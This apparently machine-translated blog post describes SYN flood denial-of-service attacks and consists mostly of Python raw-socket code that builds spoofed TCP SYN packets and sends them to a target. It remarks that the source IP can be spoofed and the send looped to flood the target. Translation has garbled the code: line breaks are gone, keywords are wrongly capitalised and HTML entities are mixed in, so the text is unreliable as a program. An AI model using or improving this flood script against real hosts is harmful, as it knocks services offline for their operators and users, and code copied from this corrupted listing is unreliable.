0x00 background
SYN Flood is one of the most popular DOS (denial of service attacks) and DDoS(distributed denial of service attacks), which is a way of using TCP protocol defects to send a large number of forged TCP connection requests, This allows the attacker to run out of resources (CPU full load or low memory).
0x01 Code
The purpose of this article is to describe how to construct packet using Python.
Use the raw socket to send packets. This program is only available for Linux. Windows can try to call WinPcap.
"' syn flood program in Python using raw sockets (Linux) & Nbsp; silver Moon ([email protected]) " # some importsimport socket, sysfrom struct import * # checksum functions needed for calculation checksumdef checksum (msg): s = 0 # Loop taking 2 characters at a time for i in range (0, len (msg), 2): w = ( Ord (Msg[i]) << 8 + (Ord (msg[i+1)) s = s + w s = (s>>16) + (s & 0xffff); #s = s + (s >>); #complement and mask to 4 B Yte Short s = ~s &&NBSP;0XFFFF&NBSP;&NBSP;&NBSP;&NBsp; return s #create a raw sockettry: s = Socket.socket (socket.af_inet, socket. SOCK_RAW, Socket. IPPROTO_TCP) Except socket.error, msg: print ' socket could not be created. Error Code: ' + str (msg[0]) + ' Message ' + msg[1] sys.exit () # tell-Kernel not-put in headers, since we is providing its.setsockopt (socket. IPPROTO_IP, Socket. ip_hdrincl, 1) # now start constructing the packetpacket = "; source_ip = ' 192.168.1.101 ' dest_ip = ' 192.168.1.1 ' # or Socket.gethostbyname (' www.google.com ') # IP Header fieldsihl = 5version = 4tos = 0tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how?? id = 54321 #Id of this Packetfrag_off = 0ttl = 255proTocol = socket. ipproto_tcpcheck = 10 # python seems to correctly fill the Checksumsaddr =socket.inet_aton ( SOURCE_IP) #Spoof The source IP address if you want Todaddr = socket.inet_aton (DEST_IP) ihl_ version = (version << 4) + ihl # the! In the pack format string means network Orderip_header = pack ('! Bbhhhbbh4s4s ', ihl_version, TOS, Tot_len, id, Frag_off, TTL, protocol, check, SADDR, daddr) # TCP header Fieldss ource = 1234 # Source portdest = 80 # Destination Portseq = 0ack_seq = 0doff = 5 #4 bit field, size of TCP header, 5 * 4 = 20 Bytes#tcp flagsfin = 0syn = 1rst = 0psh = 0ack = 0urg = 0window = socket.htons (5840) # Maximum allowed window Sizecheck = 0urg_ptr = 0 offset_res = (Doff << 4) + 0tcp_flags = fin + (syn << 1) + (rst << 2) + (PSH <<3) + ( Ack << 4) + (Urg << 5) # the! In the pack format string means network Ordertcp_header = pack ('! Hhllbbhhh ', source, dest, seq, Ack_seq, offset_res, tcp_flags, window, check, urg_ptr) # pseudo header Fieldsso Urce_address = socket.inet_aton (SOURCE_IP) Dest_address = socket.inet_aton (DEST_IP) Placeholder = 0protocol = socket. Ipproto_tcptcp_length = len (Tcp_header) psh = pack ('!4S4SBBH ', source_address, Dest_ Address, placeholder, protocol, tcp_length);p sh = psh + tcp_header; tcp_checksum = checksum (PSH) # make the TCP header again and fill the correct checksumtcp_header = pack ('! Hhllbbhhh ', SOURCE, dest, seq, Ack_seq, offset_res, tcp_flags, window, Tcp_checksum, urg_ptr) # final full Packet-syn packets Dont has any datapacket = ip_header + tcp_header #Send the packet finally-the port specified Have no effects.sendto (packet, (DEST_IP, 0)) # put this in a loop if you want to flood the TA rget #put the above line in a loop like and 1:if you want to flood
Note: The runtime requires root privileges.
Python implements SYN flood attack
